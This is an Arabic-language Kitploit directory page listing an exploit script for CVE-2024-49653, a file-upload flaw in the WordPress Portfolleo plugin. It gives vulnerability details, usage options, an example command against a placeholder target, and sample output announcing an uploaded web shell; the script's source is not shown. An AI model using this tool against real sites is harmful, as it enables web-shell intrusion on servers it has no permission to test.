Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-49653 — إضافة Portfolleo في WordPress <= 1.2 - ثغرة رفع ملفات تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-49653
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-49653

CVE-2024-49653

إضافة Portfolleo في WordPress <= 1.2 - ثغرة رفع ملفات تعسفي

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

📜 استغلال إضافة Portfolleo لووردبريس (CVE-2024-49653)

🚨 تفاصيل الثغرة

العنوان: إضافة Portfolleo لووردبريس <= 1.2 - ثغرة رفع ملفات عشوائي

الوصف:
ثغرة رفع ملفات غير مقيد بنوع خطير في إضافة Portfolleo من James Eggers تسمح برفع قشرة ويب إلى خادم الويب. تؤثر هذه المشكلة على Portfolleo من الإصدار n/a حتى 1.2.

للمزيد:

  • CWE-434: CWE-434 رفع ملفات غير مقيد بنوع خطير

درجة CVSS:

  • الدرجة: 9.9
  • الخطورة: حرجة
  • الإصدار: 3.1
  • سلسلة المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

📋 دليل المستخدم

🚀 استخدام السكربت

يستغل هذا السكربت ثغرة رفع الملفات العشوائي في إضافة Portfolleo لووردبريس (الإصدارات <= 1.2) لرفع قشرة ويب.

📦 المتطلبات

تحتاج إلى تثبيت ما يلي لتشغيل السكربت:

  • Python 3
  • مكتبة requests
  • مكتبة beautifulsoup4
  • يمكنك تثبيت المكتبات المطلوبة باستخدام:

    root@kitploit:~
    pip install requests beautifulsoup4
    

    🛠️ الاستخدام

    شغّل السكربت مع الخيارات التالية:

    root@kitploit:~
    
    CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
    
    WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
    
    options:
      -h, --help            show this help message and exit
      -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
      -U, --username USERNAME
                            WordPress username
      -p, --password PASSWORD
                            WordPress password
    

    📝 مثال

    root@kitploit:~
     
    python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
    

    📊 المخرجات المتوقعة

    إذا نجح السكربت، يجب أن ترى المخرجات التالية:

    root@kitploit:~
    [+] Logged in successfully.
    [+] Extracted _wpnonce: e5f7ffa134
    [+] Shell has been uploaded.
    [*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
    

    ⚠️ إخلاء مسؤولية

    هذا السكربت مخصص للأغراض التعليمية فقط. لا يقرّ المؤلف استخدام هذا السكربت في أنشطة غير قانونية. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.

    بواسطة: Nxploited | Khaled Alenazi

    تنزيل الأداة